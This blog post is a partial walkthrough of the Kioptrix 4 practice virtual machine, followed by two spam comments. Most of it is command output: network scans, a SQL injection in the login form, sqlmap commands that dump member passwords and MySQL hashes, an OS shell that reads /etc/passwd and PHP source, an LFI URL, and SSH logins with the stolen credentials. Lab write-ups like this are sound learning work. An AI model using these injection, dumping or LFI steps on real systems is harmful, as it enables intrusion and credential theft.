2013. november 20., szerda

Kioptrix 4

root@kali:~# netdiscover

 Currently scanning: 192.168.88.0/16   |   Screen View: Unique Hosts                                                              

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                 
192.168.56.100  08:00:27:23:30:51    01    060   CADMUS COMPUTER SYSTEMS                                                         
 192.168.56.103  08:00:27:e0:cd:64    01    060   CADMUS COMPUTER SYSTEMS                                                         
          
root@kali:~# unicornscan 192.168.56.103
TCP open                http[   80]        from 192.168.56.103  ttl 64

root@kali:~# nikto -host 192.168.56.103
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        80
+ Start Time:         2013-11-19 14:22:55 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2013-11-19 14:23:06 (GMT1) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.103/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Tue Nov 19 14:23:42 2013
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:329)                                                                              
                         
==> DIRECTORY: http://192.168.56.103/images/                                                                                      
                         
+ http://192.168.56.103/index (CODE:200|SIZE:1255)                                                                                
                         
+ http://192.168.56.103/index.php (CODE:200|SIZE:1255)                                                                            
                         
==> DIRECTORY: http://192.168.56.103/john/                                                                                        
                         
+ http://192.168.56.103/logout (CODE:302|SIZE:0)                                                                                  
                         
+ http://192.168.56.103/member (CODE:302|SIZE:220)                                                                                
                         
+ http://192.168.56.103/server-status (CODE:403|SIZE:334)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.103/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.103/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)                                                                              
-----------------
DOWNLOADED: 4592 - FOUND: 6

Mantra http://192.168.56.103/

Login

Load url
http://192.168.56.103/checklogin.php

Enable Post data
myusername=admin&mypassword='pass&Submit=Login
execute

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

root@kali:~# sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login"

--dbs

available databases [3]:
[*] information_schema
[*] members
[*] mysql

...

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D members -T members -C id,password,username --dump

+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+


http://192.168.56.103/john/

http://192.168.56.103/robert/

http://192.168.56.103/john/john.php
http://192.168.56.103/robert/robert.php

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D mysql -T user -C Host,User,Password --dump

+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| 127.0.0.1 | root             |                                    |
| Kioptrix4 |           |                                    |
| Kioptrix4 | root             |                                    |
| localhost |           |                                    |
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
| localhost | root             | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
+-----------+------------------+-------------------------------------------+





--os-shell

os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
---

os-shell> cat /etc/group
...
admin:x:115:loneferret
...

os-shell> ls /var/www
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbjbbq.php
tmpbtahr.php
tmpueovq.php
tmpuxztg.php

os-shell> cat /var/www/login_success.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
    header("location:index.php");
}else{
    $id=$_GET['username'];
     header("location:member.php?username=$id");
}
?>

os-shell> cat /var/www/member.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:index.php");
}

$page = $_GET['username'];

//$page = preg_replace('/etc/','',$page,1) . ".php";
$page = preg_replace('/etc/','',$page,1);

if(file_exists($page)){
    $memPage = $page . "/" . $page . ".php";
    include($memPage);
}else{
    print ("User " .$page.'<br><br>');
    print("Oups, something went wrong with your member's page account.<br>Please contact your local Administrator<br> to fix

the issue.");
    print ('<br>');
    print('<form method="link" action="index.php"><input type=submit value="Back"></form>');
}
?>
---
...
http://192.168.56.102/member.php?username=/etc/etc/passwd% 0 0

This is an LFI

os-shell> netstat -nap | grep tcp
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4375/sh        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -              
tcp        0      0 192.168.56.103:80       192.168.56.101:43597    ESTABLISHED 4375/sh        
---

root@kali:/var/www/phpshells# nmap -sS 192.168.56.103

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-19 15:26 CET
Nmap scan report for 192.168.56.103
Host is up (0.00025s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E0:CD:64 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

root@kali:/var/www/phpshells# ssh john@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (RSA) to the list of known hosts.
john@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ john:~$ pwd
*** unknown command: pwd
john:~$ ls
john:~$ id
*** unknown command: id
john:~$ ls
john:~$ ls /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.


os-shell> ls -al /home/john
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 28
drwxr-xr-x 2 john john 4096 Feb  4  2012 .
drwxr-xr-x 5 root root 4096 Feb  4  2012 ..
-rw------- 1 john john   61 Feb  4  2012 .bash_history
-rw-r--r-- 1 john john  220 Feb  4  2012 .bash_logout
-rw-r--r-- 1 john john 2940 Feb  4  2012 .bashrc
-rw-r--r-- 1 john john  118 Feb  4  2012 .lhistory
-rw-r--r-- 1 john john  586 Feb  4  2012 .profile

os-shell> cat /home/john/.profile
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

john:~$
john:~$ echo $PATH
*** forbidden path -> "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
*** Kicked out
Connection to 192.168.56.103 closed.

root@kali:/var/www/phpshells# ssh robert@192.168.56.103
robert@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls


robert:~$ lpath
Allowed:
 /home/robert


That's all. I have not found the solution. My current goal was to identify the vulnerabilities. Currently, my knowledge is not enough to privilege escalation.

2 megjegyzés:

  1. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you gotta watch this video
    right away...

    (VIDEO) Have your ex CRAWLING back to you...?

    VálaszTörlés
  2. BlueHost is ultimately the best web-hosting provider with plans for any hosting needs.

    VálaszTörlés